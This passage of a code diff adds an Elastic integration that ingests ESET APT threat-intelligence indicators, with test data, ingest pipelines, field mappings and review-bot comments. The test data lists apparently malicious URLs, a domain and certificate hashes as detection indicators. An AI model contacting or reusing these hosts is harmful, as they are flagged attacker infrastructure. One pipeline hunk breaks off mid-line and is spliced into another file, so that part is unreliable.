"indicator--6602ac29-0cb3-4da9-b2dc-091b8a01ebfc", + "meta_category": "network", + "name": "url", + "valid_until": "2024-10-01T13:16:00.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-10-02T13:16:00.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--6602ac29-0cb3-4da9-b2dc-091b8a01ebfc\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"network\"}], \"labels\": [\"misp:name=\\\"url\\\"\", \"misp:meta-category=\\\"network\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-10-02T13:16:00.000Z\", \"pattern\": \"[url:value = 'https://billyconsult.com/wp-media.php' AND url:x_misp_scheme = 'https' AND url:x_misp_resource_path = '/wp-media.php' AND url:x_misp_port = '443']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", 
\"valid_from\": \"2022-03-26T00:00:00Z\", \"valid_until\": \"2023-09-29T00:00:00Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "last_seen": "2023-10-02T13:16:00.000Z", + "modified_at": "2023-10-02T13:16:00.000Z", + "provider": "eset", + "type": "url", + "url": { + "original": "https://billyconsult.com/wp-media.php", + "path": "/wp-media.php", + "port": 443, + "scheme": "https" + } + } + } + }, + { + "@timestamp": "2023-10-02T15:42:54.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--a013b792-6735-4ae4-ad1a-6ecfa9b1d216", + "meta_category": "network", + "name": "domain-ip", + "valid_until": "2024-10-01T15:42:54.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-10-02T15:42:54.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--a013b792-6735-4ae4-ad1a-6ecfa9b1d216\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"network\"}], \"labels\": [\"misp:name=\\\"domain-ip\\\"\", \"misp:meta-category=\\\"network\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-10-02T15:42:54.000Z\", \"pattern\": \"[domain-name:value = 'brianrep.com' AND domain-name:value = 'brianrep.com']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-05-05T00:00:00Z\", \"valid_until\": \"2023-09-28T00:00:00Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "last_seen": "2023-10-02T15:42:54.000Z", + "modified_at": "2023-10-02T15:42:54.000Z", + "provider": "eset", + "type": "domain-name", + "url": { + "original": "brianrep.com" + } + } + } + }, + { + 
"@timestamp": "2023-10-02T15:46:12.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--e8d72126-34cd-4ef0-ad5f-b5d449e5a5e3", + "meta_category": "network", + "name": "url", + "valid_until": "2024-10-01T15:46:12.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-10-02T15:46:12.000Z\", \"created_by_ref\": \"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--e8d72126-34cd-4ef0-ad5f-b5d449e5a5e3\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"network\"}], \"labels\": [\"misp:name=\\\"url\\\"\", \"misp:meta-category=\\\"network\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-10-02T15:46:12.000Z\", \"pattern\": \"[url:value = 'https://brianrep.com/dnquery.php' AND url:x_misp_scheme = 'https' AND url:x_misp_resource_path = '/dnquery.php' AND url:x_misp_port = '443']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-05-05T00:00:00Z\", \"valid_until\": \"2023-09-28T00:00:00Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "last_seen": "2023-10-02T15:46:12.000Z", + "modified_at": "2023-10-02T15:46:12.000Z", + "provider": "eset", + "type": "url", + "url": { + "original": "https://brianrep.com/dnquery.php", + "path": "/dnquery.php", + "port": 443, + "scheme": "https" + } + } + } + }, + { + "@timestamp": "2023-10-02T12:10:47.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--c079b60b-dd07-4c3c-b9b8-63573708bcdc", + "meta_category": "network", + "name": "x509", + "valid_until": "2024-10-01T12:10:47.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"created\": \"2023-10-02T12:10:47.000Z\", \"created_by_ref\": 
\"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\", \"id\": \"indicator--c079b60b-dd07-4c3c-b9b8-63573708bcdc\", \"kill_chain_phases\": [{\"kill_chain_name\": \"misp-category\", \"phase_name\": \"network\"}], \"labels\": [\"misp:name=\\\"x509\\\"\", \"misp:meta-category=\\\"network\\\"\", \"misp:to_ids=\\\"True\\\"\"], \"modified\": \"2023-10-02T12:10:47.000Z\", \"pattern\": \"[x509-certificate:hashes.MD5 = '0a2fd4d1cdc852678a40cbccfd4b7fbd' AND x509-certificate:hashes.SHA1 = 'f23372e12d37178544acd7448f469ccaf71ad244' AND x509-certificate:hashes.SHA256 = '472b1939ed7df19bad95512e63ca44aac4d95a7109d31f98a042e45c37a5a630' AND x509-certificate:issuer = 'C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Extended Validation Code Signing CA' AND x509-certificate:serial_number = '00c74f79c78393ebf22858e9ad3914567f' AND x509-certificate:signature_algorithm = '1.2.840.113549.1.1.11' AND x509-certificate:subject = 'serialNumber=SC331902, ??=GB, ??=Private Organization, C=GB, postalCode=ML12 6HQ, ST=Scottish Borders, L=Broughton, ??=Galavale, O=SimpleHelp Ltd, CN=SimpleHelp Ltd' AND x509-certificate:version = '3' AND x509-certificate:validity_not_after = '2024-02-25 23:59:59+00:00' AND x509-certificate:validity_not_before = '2021-02-25 00:00:00+00:00']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"spec_version\": \"indicator\", \"type\": \"indicator\", \"valid_from\": \"2023-10-02T12:10:47Z\"}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "file": { + "hash": { + "md5": "0a2fd4d1cdc852678a40cbccfd4b7fbd", + "sha1": "f23372e12d37178544acd7448f469ccaf71ad244", + "sha256": "472b1939ed7df19bad95512e63ca44aac4d95a7109d31f98a042e45c37a5a630" + } + }, + "last_seen": "2023-10-02T12:10:47.000Z", + "modified_at": "2023-10-02T12:10:47.000Z", + "provider": "eset", + "type": "x509-certificate", + "x509": { + 
"issuer": { + "common_name": [ + "COMODO RSA Extended Validation Code Signing CA" + ], + "country": [ + "GB" + ], + "distinguished_name": "C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Extended Validation Code Signing CA", + "locality": [ + "Salford" + ], + "organization": [ + "COMODO CA Limited" + ], + "state_or_province": [ + "Greater Manchester" + ] + }, + "not_after": "2024-02-25T23:59:59.000Z", + "not_before": "2021-02-25T00:00:00.000Z", + "serial_number": "00c74f79c78393ebf22858e9ad3914567f", + "signature_algorithm": "1.2.840.113549.1.1.11", + "subject": { + "common_name": [ + "SimpleHelp Ltd" + ], + "country": [ + "GB" + ], + "distinguished_name": "serialNumber=SC331902, ??=GB, ??=Private Organization, C=GB, postalCode=ML12 6HQ, ST=Scottish Borders, L=Broughton, ??=Galavale, O=SimpleHelp Ltd, CN=SimpleHelp Ltd", + "locality": [ + "Broughton" + ], + "organization": [ + "SimpleHelp Ltd" + ], + "state_or_province": [ + "Scottish Borders" + ] + }, + "version_number": "3" + } + } + } + } + ] +} \ No newline at end of file diff --git a/packages/ti_eset/data_stream/apt/_dev/test/system/test-httpjson-config.yml b/packages/ti_eset/data_stream/apt/_dev/test/system/test-httpjson-config.yml new file mode 100644 index 00000000000..bd87152a77a --- /dev/null +++ b/packages/ti_eset/data_stream/apt/_dev/test/system/test-httpjson-config.yml @@ -0,0 +1,13 @@ +input: httpjson +service: eti +vars: + username: test + password: test +data_stream: + vars: + preserve_original_event: true + url: http://{{Hostname}}:{{Port}}/taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/97e3eb74ae5f46dd9e22f677a6938ee7/objects/ + interval: 30s + enable_request_tracer: true +assert: + hit_count: 26 diff --git a/packages/ti_eset/data_stream/apt/agent/stream/httpjson.yml.hbs b/packages/ti_eset/data_stream/apt/agent/stream/httpjson.yml.hbs new file mode 100644 index 00000000000..41117cedade --- /dev/null 
+++ b/packages/ti_eset/data_stream/apt/agent/stream/httpjson.yml.hbs
@@ -0,0 +1,72 @@
+config_version: "2"
+
+interval: {{interval}}
+request.method: "GET"
+{{#if enable_request_tracer}}
+request.tracer.filename: "../../logs/httpjson/http-request-trace-*.ndjson"
+{{/if}}
+
+auth.basic.user: {{username}}
+auth.basic.password: {{password}}
+
+{{#if url}}
+request.url: {{url}}
+{{/if}}
+{{#if ssl}}
+request.ssl: {{ssl}}
+{{/if}}
+{{#if http_client_timeout}}
+request.timeout: {{http_client_timeout}}
+{{/if}}
+{{#if proxy_url}}
+request.proxy_url: {{proxy_url}}
+{{/if}}
+
+request.transforms:
+ - set:
+ target: header.Content-Type
+ value: application/taxii+json;version=2.1
+ - set:
+ target: header.Accept
+ value: application/taxii+json;version=2.1
+ - set:
+ target: url.params.match[type]
+ value: indicator
+ - set:
+ target: url.params.limit
+ value: {{page_size}}
+ - set:
+ target: url.params.added_after
+ value: '[[ .cursor.timestamp ]]'
+ default: '[[ formatDate (now (parseDuration "-{{initial_interval}}")) "2006-01-02T15:04:05.000Z" ]]'
+
+response.pagination:
+ - set:
+ target: url.params.added_after
+ value: >-
+ [[ if .last_response.body.more ]][[ .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ end ]]
+ fail_on_template_error: true
+
+response.split:
+ target: body.objects
+
+cursor:
+ timestamp:
+ value: >-
+ [[ if .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ else ]][[.last_response.url.params.Get "added_after"]][[ end ]]
+ ignore_empty_value: true
+
+tags:
+{{#if preserve_original_event}}
+ - preserve_original_event
+{{/if}}
+{{#each tags as |tag|}}
+ - {{tag}}
+{{/each}}
+{{#contains "forwarded" tags}}
+publisher_pipeline.disable_host: true
+{{/contains}}
+{{#if processors}}
+processors:
+{{processors}}
+{{/if}}
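Review bot: `auth.basic.user: {{username}}` and `auth.basic.password: {{password}}` interpolate the credentials into YAML unquoted, so a password that starts with `*`, `[`, `{` or `&`, or contains `: ` or ` #`, will either fail to parse or be silently truncated and the input then authenticates with the wrong secret. Quoting the value, `auth.basic.password: "{{password}}"`, narrows the problem to `"` and `\`; confirm how the package's templating escapes those before relying on it, and if the package-level var definition (not in this hunk) already restricts the character set, a comment saying so next to these two lines is enough. The tracer file path is correctly emitted only behind `enable_request_tracer`; a comment such as `# trace files record full requests and may include the Basic auth header; debugging only` next to `request.tracer.filename` would make that cost explicit to whoever edits the template later.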
diff --git a/packages/ti_eset/data_stream/apt/elasticsearch/ilm/default_policy.json b/packages/ti_eset/data_stream/apt/elasticsearch/ilm/default_policy.json
new file mode 100644
index 00000000000..206c1e2d1b8
--- /dev/null
+++ b/packages/ti_eset/data_stream/apt/elasticsearch/ilm/default_policy.json
@@ -0,0 +1,23 @@
+{
+ "policy": {
+ "phases": {
+ "delete": {
+ "actions": {
+ "delete": {}
+ },
+ "min_age": "365d"
+ },
+ "hot": {
+ "actions": {
+ "rollover": {
+ "max_age": "2d",
+ "max_size": "50gb"
+ },
+ "set_priority": {
+ "priority": 100
+ }
+ }
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/packages/ti_eset/data_stream/apt/elasticsearch/ingest_pipeline/default.yml b/packages/ti_eset/data_stream/apt/elasticsearch/ingest_pipeline/default.yml
new file mode 100644
index 00000000000..99687e6838e
--- /dev/null
+++ b/packages/ti_eset/data_stream/apt/elasticsearch/ingest_pipeline/default.yml
@@ -0,0 +1,166 @@
+---
+description: Initial pipeline for parsing ETI TAXII2 feed
+processors:
+ - set:
+ field: ecs.version
+ value: '8.11.0'
+ - set:
+ field: event.kind
+ value: enrichment
+ - append:
+ field: event.category
+ value: threat
+ allow_duplicates: false
+ - append:
+ field: event.type
+ value: indicator
+ allow_duplicates: false
+ - set:
+ field: threat.indicator.provider
+ value: eset
+ - rename:
+ field: message
+ target_field: event.original
+ ignore_missing: true
+ if: ctx.event?.original == null
+ - json:
+ field: event.original
+ target_field: eti
+ - drop:
+ if: ctx.eti?.type != 'indicator'
+ - set:
+ field: threat.feed.name
+ value: "ESET APT stix 2.1"
+ - date:
+ field: eti.created
+ target_field: "@timestamp"
+ formats:
+ - "ISO8601"
+ if: "ctx.eti?.created != null"
+ - date:
+ field: eti.modified
+ target_field: threat.indicator.last_seen
+ formats:
+ - "ISO8601"
+ if: "ctx.eti?.modified != null"
+ - set:
+ field: threat.indicator.modified_at
+ copy_from: threat.indicator.last_seen
+ if: "ctx.threat?.indicator?.last_seen != null"
+ - script:
+ lang: painless
+ source: >-
+ if (ctx.eset == null) {
+ ctx.eset = new HashMap();
+ }
+
+ ctx.eset.valid_until = ZonedDateTime.parse(ctx['@timestamp']).plusDays(365);
+ if: "ctx['@timestamp'] != null"
+
+ - rename:
+ field: eti.id
+ target_field: eset.id
+ ignore_missing: true
+
+ - foreach:
+ field: eti.labels
+ if: ctx.eti?.labels != null
+ processor:
+ grok:
+ field: _ingest._value
+ patterns:
+ - "^misp:name=\"%{DATA:eset.name}\""
+ - "^misp:type=\"%{DATA:eset.type}\""
+ - "^misp:category=\"%{DATA:eset.category}\""
+ - "^misp:meta-category=\"%{DATA:eset.meta_category}\""
+ ignore_failure: true
+
+ - set:
+ field: threat.indicator.type
+ value: x509-certificate
+ if: "ctx.eset?.name == 'x509'"
+ - set:
+ field: threat.indicator.type
+ value: domain-name
+ if: ctx.eset?.name != null && ctx.eset?.name.startsWith('domain')
+ - set:
+ field: threat.indicator.type
+ value: file
+ if: |
+ ctx.eset?.name == 'file' ||
+ ctx.eset?.meta_category == 'file'
+ - set:
+ field: threat.indicator.type
+ value: url
+ if: ctx.eset?.name == 'url'
+ - set:
+ field: threat.indicator.type
+ value: email-addr
+ if: |
+ ctx.eset?.name == 'email' ||
+ (ctx.eset?.type != null && ctx.eset?.type?.startsWith('email'))
+
+ - split:
+ field: eti.pattern
+ target_field: eti._patterns
+ separator: ' AND '
+ if: ctx.eti?.pattern != null
+
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline-file" }}'
+ if: ctx.threat?.indicator?.type == 'file'
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline-email" }}'
+ if: ctx.threat?.indicator?.type == 'email-addr'
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline-url" }}'
+ if: ctx.threat?.indicator?.type == 'url'
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline-domain-ip" }}'
+ if: ctx.threat?.indicator?.type == 'domain-name'
+ - pipeline:
+ name: '{{ IngestPipeline "pipeline-cert" }}'
+ if: ctx.threat?.indicator?.type == 'x509-certificate'
+ - set:
+ field: threat.indicator.confidence
+ value: High
+ - remove:
+ field:
+ - eti
+ ignore_missing: true
+ - remove:
+ field: event.original
+ if: "ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))"
+ ignore_failure: true
+ ignore_missing: true
+ - script:
+ tag: script_to_drop_null_values
+ lang: painless
+ description: Drops null/empty values recursively.
+ source: |-
+ boolean drop(Object o) {
+ if (o == null || o == '') {
+ return true;
+ } else if (o instanceof Map) {
+ ((Map) o).values().removeIf(v -> drop(v));
+ return (((Map) o).size() == 0);
+ } else if (o instanceof List) {
+ ((List) o).removeIf(v -> drop(v));
+ return (((List) o).length == 0);
+ }
+ return false;
+ }
+ drop(ctx);
+ - append:
+ field: event.kind
+ value: pipeline_error
+ allow_duplicates: false
+ if: ctx.error?.message != null
+on_failure:
+ - set:
+ field: error.message
+ value: '{{ _ingest.on_failure_message }}'
+ - set:
+ field: event.kind
+ tag: set_pipeline_error_to_event_kind
+ value: pipeline_error
diff --git a/packages/ti_eset/data_stream/apt/elasticsearch/ingest_pipeline/pipeline-cert.yml b/packages/ti_eset/data_stream/apt/elasticsearch/ingest_pipeline/pipeline-cert.yml
new file mode 100644
index 00000000000..3358e12c81b
--- /dev/null
+++ b/packages/ti_eset/data_stream/apt/elasticsearch/ingest_pipeline/pipeline-cert.yml
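Review bot: The painless `script` that sets `eset.valid_until` ignores the `valid_until` the STIX object itself carries and always derives expiry as `@timestamp` plus 365 days; the expected test output earlier in this commit shows the effect, where an indicator whose original has `"valid_until": "2023-09-29T00:00:00Z"` ends up with `eset.valid_until` of `2024-10-01T13:16:00.000Z`. Since fields.yml marks this data stream as the IOC-expiration transform source, presumably via this field, provider-expired indicators would keep matching for up to a year longer than ESET intended. Prefer the feed's own value when present and fall back to the 365-day default only when it is absent (the x509 object in the test data has no `valid_until`); `eset.valid_until` is mapped as `date`, so the feed's ISO-8601 string can be assigned directly. Proposed replacement for the script processor:
```yaml
  - script:
      lang: painless
      source: |-
        if (ctx.eset == null) {
          ctx.eset = new HashMap();
        }
        // Honour the provider's own expiry; synthesise one only when the object lacks it.
        if (ctx.eti?.valid_until != null) {
          ctx.eset.valid_until = ctx.eti.valid_until;
        } else {
          ctx.eset.valid_until = ZonedDateTime.parse(ctx['@timestamp']).plusDays(365);
        }
      if: "ctx['@timestamp'] != null"
```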
@@ -0,0 +1,119 @@ +--- +description: Pipeline for processing x509 events +processors: + - foreach: + field: eti._patterns + processor: + grok: + field: _ingest._value + patterns: + - "^\\[?x509-certificate:hashes.MD5%{SPACE}=%{SPACE}'%{DATA:threat.indicator.file.hash.md5}'\\]?" + - "^\\[?x509-certificate:hashes.SHA1%{SPACE}=%{SPACE}'%{DATA:threat.indicator.file.hash.sha1}'\\]?" + - "^\\[?x509-certificate:hashes.SHA256%{SPACE}=%{SPACE}'%{DATA:threat.indicator.file.hash.sha256}'\\]?" + - "^\\[?x509-certificate:serial_number%{SPACE}=%{SPACE}'%{DATA:threat.indicator.x509.serial_number}'\\]?" + - "^\\[?x509-certificate:signature_algorithm%{SPACE}=%{SPACE}'%{DATA:threat.indicator.x509.signature_algorithm}'\\]?" + - "^\\[?x509-certificate:version%{SPACE}=%{SPACE}'%{DATA:threat.indicator.x509.version_number}'\\]?" + - "^\\[?x509-certificate:validity_not_after%{SPACE}=%{SPACE}'%{TIMESTAMP_ISO8601:threat.indicator.x509.not_after}'\\]?" + - "^\\[?x509-certificate:validity_not_before%{SPACE}=%{SPACE}'%{TIMESTAMP_ISO8601:threat.indicator.x509.not_before}'\\]?" + - "^\\[?x509-certificate:issuer%{SPACE}=%{SPACE}'%{DATA:threat.indicator.x509.issuer.distinguished_name}'\\]?" + - "^\\[?x509-certificate:subject%{SPACE}=%{SPACE}'%{DATA:threat.indicator.x509.subject.distinguished_name}'\\]?" + ignore_failure: true + + - date: + field: threat.indicator.x509.not_after + target_field: threat.indicator.x509.not_after + formats: + - "ISO8601" + - "yyyy-MM-dd HH:mm:ssz" + if: "ctx.threat?.indicator?.x509?.not_after != null" + - date: + field: threat.indicator.x509.not_before + target_field: threat.indicator.x509.not_before + formats: + - "ISO8601" + - "yyyy-MM-dd HH:mm:ssz" + if: "ctx.threat?.indicator?.x509?.not_before != null" + + - kv: + field: threat.indicator.x509.issuer.distinguished_name + target_field: eti._issuer_fields + field_split: "(? + ctx.threat.indicator.email.address = ctx.threat.indicator.email.address.splitOnToken(' '); 
diff --git a/packages/ti_eset/data_stream/apt/elasticsearch/ingest_pipeline/pipeline-file.yml b/packages/ti_eset/data_stream/apt/elasticsearch/ingest_pipeline/pipeline-file.yml
new file mode 100644
index 00000000000..60fa7fcf864
--- /dev/null
+++ b/packages/ti_eset/data_stream/apt/elasticsearch/ingest_pipeline/pipeline-file.yml
@@ -0,0 +1,14 @@
+---
+description: Pipeline for processing file events
+processors:
+ - foreach:
+ field: eti._patterns
+ processor:
+ grok:
+ field: _ingest._value
+ patterns:
+ - "^\\[?file:hashes.MD5%{SPACE}=%{SPACE}'%{DATA:threat.indicator.file.hash.md5}'\\]?"
+ - "^\\[?file:hashes.SHA1%{SPACE}=%{SPACE}'%{DATA:threat.indicator.file.hash.sha1}'\\]?"
+ - "^\\[?file:hashes.SHA256%{SPACE}=%{SPACE}'%{DATA:threat.indicator.file.hash.sha256}'\\]?"
+ - "^\\[?file:name%{SPACE}=%{SPACE}'%{DATA:threat.indicator.file.name}'\\]?"
+ ignore_failure: true
diff --git a/packages/ti_eset/data_stream/apt/elasticsearch/ingest_pipeline/pipeline-url.yml b/packages/ti_eset/data_stream/apt/elasticsearch/ingest_pipeline/pipeline-url.yml
new file mode 100644
index 00000000000..d2119476eb9
--- /dev/null
+++ b/packages/ti_eset/data_stream/apt/elasticsearch/ingest_pipeline/pipeline-url.yml
@@ -0,0 +1,14 @@
+---
+description: Pipeline for processing url events
+processors:
+ - foreach:
+ field: eti._patterns
+ processor:
+ grok:
+ field: _ingest._value
+ patterns:
+ - "^\\[?url:value%{SPACE}=%{SPACE}'%{DATA:threat.indicator.url.original}'\\]?"
+ - "^\\[?url:x_misp_scheme%{SPACE}=%{SPACE}'%{DATA:threat.indicator.url.scheme}'\\]?"
+ - "^\\[?url:x_misp_port%{SPACE}=%{SPACE}'%{DATA:threat.indicator.url.port:int}'\\]?"
+ - "^\\[?url:x_misp_resource_path%{SPACE}=%{SPACE}'%{DATA:threat.indicator.url.path}'\\]?"
+ ignore_failure: true
diff --git a/packages/ti_eset/data_stream/apt/fields/agent.yml b/packages/ti_eset/data_stream/apt/fields/agent.yml
new file mode 100644
index 00000000000..845b84ed9c0
--- /dev/null
+++ b/packages/ti_eset/data_stream/apt/fields/agent.yml
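Review bot: pipeline-file extracts only the MD5/SHA1/SHA256 hashes and `file:name` from the STIX pattern, while the sample_event.json added later in this commit shows the same pattern also carrying `file:x_misp_fullpath` and `file:extensions.'windows-pebinary-ext'.imphash`, both of which are lost when default.yml removes `eti`. ECS provides `threat.indicator.file.path` and `threat.indicator.file.pe.imphash` for these, so an extra pattern such as `- "^\\[?file:x_misp_fullpath%{SPACE}=%{SPACE}'%{DATA:threat.indicator.file.path}'\\]?"` (plus the matching `external: ecs` entries in fields/ecs.yml) would keep the path and import-hash indicators usable for matching. If those properties are intentionally out of scope, a comment above `patterns:` naming the ignored STIX properties would save the next reader from re-raising this.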
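Review bot: pipeline-url captures `url:value` into `threat.indicator.url.original` but never derives `threat.indicator.url.domain`, even though fields/ecs.yml declares that field; the expected output for the URL indicators earlier in this commit shows only `original`, `path`, `port` and `scheme`. Indicator-match rules keyed on `threat.indicator.url.domain` will therefore not see URL indicators from this feed. A `uri_parts` processor after the `foreach` fills the gap; as far as I recall `uri_parts` replaces the target object when `target_field` is set, so writing into a scratch field under `eti` (which default.yml already removes) and copying the domain across avoids clobbering the grok'd `port` and `scheme`:
```yaml
      ignore_failure: true
  # … unchanged: foreach/grok above …
  - uri_parts:
      field: threat.indicator.url.original
      target_field: eti._url
      keep_original: false
      ignore_failure: true
      if: ctx.threat?.indicator?.url?.original != null
  - set:
      field: threat.indicator.url.domain
      copy_from: eti._url.domain
      ignore_empty_value: true
      if: ctx.eti?._url?.domain != null
```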
@@ -0,0 +1,201 @@ +- name: cloud + title: Cloud + group: 2 + description: Fields related to the cloud or infrastructure the events are coming from. + footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.' + type: group + fields: + - name: account.id + level: extended + type: keyword + ignore_above: 1024 + description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment. + + Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.' + example: 666777888999 + - name: availability_zone + level: extended + type: keyword + ignore_above: 1024 + description: Availability zone in which this host is running. + example: us-east-1c + - name: instance.id + level: extended + type: keyword + ignore_above: 1024 + description: Instance ID of the host machine. + example: i-1234567890abcdef0 + - name: instance.name + level: extended + type: keyword + ignore_above: 1024 + description: Instance name of the host machine. + - name: machine.type + level: extended + type: keyword + ignore_above: 1024 + description: Machine type of the host machine. + example: t2.medium + - name: provider + level: extended + type: keyword + ignore_above: 1024 + description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. + example: aws + - name: region + level: extended + type: keyword + ignore_above: 1024 + description: Region in which this host is running. + example: us-east-1 + - name: project.id + type: keyword + description: Name of the project in Google Cloud. + - name: image.id + type: keyword + description: Image ID for the cloud instance. 
+- name: container + title: Container + group: 2 + description: 'Container fields are used for meta information about the specific container that is the source of information. + + These fields help correlate data based containers from any runtime.' + type: group + fields: + - name: id + level: core + type: keyword + ignore_above: 1024 + description: Unique container id. + - name: image.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the image the container was built on. + - name: labels + level: extended + type: object + object_type: keyword + description: Image labels. + - name: name + level: extended + type: keyword + ignore_above: 1024 + description: Container name. +- name: host + title: Host + group: 2 + description: 'A host is defined as a general computing instance. + + ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.' + type: group + fields: + - name: architecture + level: core + type: keyword + ignore_above: 1024 + description: Operating system architecture. + example: x86_64 + - name: domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the domain of which the host is a member. + + For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.' + example: CONTOSO + default_field: false + - name: hostname + level: core + type: keyword + ignore_above: 1024 + description: 'Hostname of the host. + + It normally contains what the `hostname` command returns on the host machine.' + - name: id + level: core + type: keyword + ignore_above: 1024 + description: 'Unique host id. + + As hostname is not always unique, use values that are meaningful in your environment. + + Example: The current usage of `beat.name`.' 
+ - name: ip + level: core + type: ip + description: Host ip addresses. + - name: mac + level: core + type: keyword + ignore_above: 1024 + description: Host mac addresses. + - name: name + level: core + type: keyword + ignore_above: 1024 + description: 'Name of the host. + + It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.' + - name: os.family + level: extended + type: keyword + ignore_above: 1024 + description: OS family (such as redhat, debian, freebsd, windows). + example: debian + - name: os.kernel + level: extended + type: keyword + ignore_above: 1024 + description: Operating system kernel version as a raw string. + example: 4.4.0-112-generic + - name: os.name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + default_field: false + description: Operating system name, without the version. + example: Mac OS X + - name: os.platform + level: extended + type: keyword + ignore_above: 1024 + description: Operating system platform (such centos, ubuntu, windows). + example: darwin + - name: os.version + level: extended + type: keyword + ignore_above: 1024 + description: Operating system version as a raw string. + example: 10.14.1 + - name: type + level: core + type: keyword + ignore_above: 1024 + description: 'Type of host. + + For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.' + - name: containerized + type: boolean + description: > + If the host is a container. + + - name: os.build + type: keyword + example: "18D109" + description: > + OS build information. + + - name: os.codename + type: keyword + example: "stretch" + description: > + OS codename, if any. + +- name: input.type + type: keyword + description: Input type. 
diff --git a/packages/ti_eset/data_stream/apt/fields/base-fields.yml b/packages/ti_eset/data_stream/apt/fields/base-fields.yml
new file mode 100644
index 00000000000..7c798f4534c
--- /dev/null
+++ b/packages/ti_eset/data_stream/apt/fields/base-fields.yml
@@ -0,0 +1,12 @@
+- name: data_stream.type
+ type: constant_keyword
+ description: Data stream type.
+- name: data_stream.dataset
+ type: constant_keyword
+ description: Data stream dataset.
+- name: data_stream.namespace
+ type: constant_keyword
+ description: Data stream namespace.
+- name: '@timestamp'
+ type: date
+ description: Event timestamp.
diff --git a/packages/ti_eset/data_stream/apt/fields/ecs.yml b/packages/ti_eset/data_stream/apt/fields/ecs.yml
new file mode 100644
index 00000000000..5162c5f7184
--- /dev/null
+++ b/packages/ti_eset/data_stream/apt/fields/ecs.yml
@@ -0,0 +1,92 @@ +- external: ecs + name: ecs.version +- external: ecs + name: message +- external: ecs + name: error.message +- external: ecs + name: event.category +- external: ecs + name: event.ingested +- external: ecs + name: event.kind +- external: ecs + name: event.original +- external: ecs + name: event.created +- external: ecs + name: tags +- external: ecs + name: threat.indicator.name +- external: ecs + name: threat.indicator.confidence +- external: ecs + name: threat.indicator.url.original +- external: ecs + name: threat.indicator.type +- external: ecs + name: threat.indicator.description +- external: ecs + name: threat.indicator.modified_at +- external: ecs + name: threat.indicator.last_seen +- external: ecs + name: threat.feed.name +- external: ecs + name: threat.indicator.email.address +- external: ecs + name: threat.indicator.file.hash.md5 +- external: ecs + name: threat.indicator.file.hash.sha1 +- external: ecs + name: threat.indicator.file.hash.sha256 +- external: ecs + name: threat.indicator.file.name +- external: ecs + name: threat.indicator.provider +- external: ecs + name: threat.indicator.url.domain +- external: ecs + name: threat.indicator.url.path +- external: ecs + name: 